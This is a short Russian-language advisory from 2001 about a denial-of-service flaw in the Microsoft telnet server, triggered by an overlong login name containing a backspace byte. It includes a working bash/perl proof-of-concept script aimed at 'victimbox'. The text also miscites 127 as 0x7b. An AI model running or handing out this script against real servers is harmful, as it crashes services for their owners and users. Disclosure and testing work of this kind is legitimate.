Дополнительная информация о возможности DOS для MS telnet

Дата публикации:
13.06.2001
Дата изменения:
17.10.2006
Всего просмотров:
1331
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

Как стало известно, DOS происходит если буфер, в который заноситься имя пользователя при входе в систему, превышает 4300 знаков, и посылаемый код содержит 127(0x7b, backspace). Это приведет к краху сервера с ошибкой 0x41414141 .

Для проверки на уязвимость используйте следующий скрипт:



- test.sh -

#!/bin/bash

( sleep 1

perl -e '{printf "%s\x7f%s","A"x4500,"A"x100}'

sleep 3

) | telnet victimbox

- eof -
 


или введите имя

CAPTCHA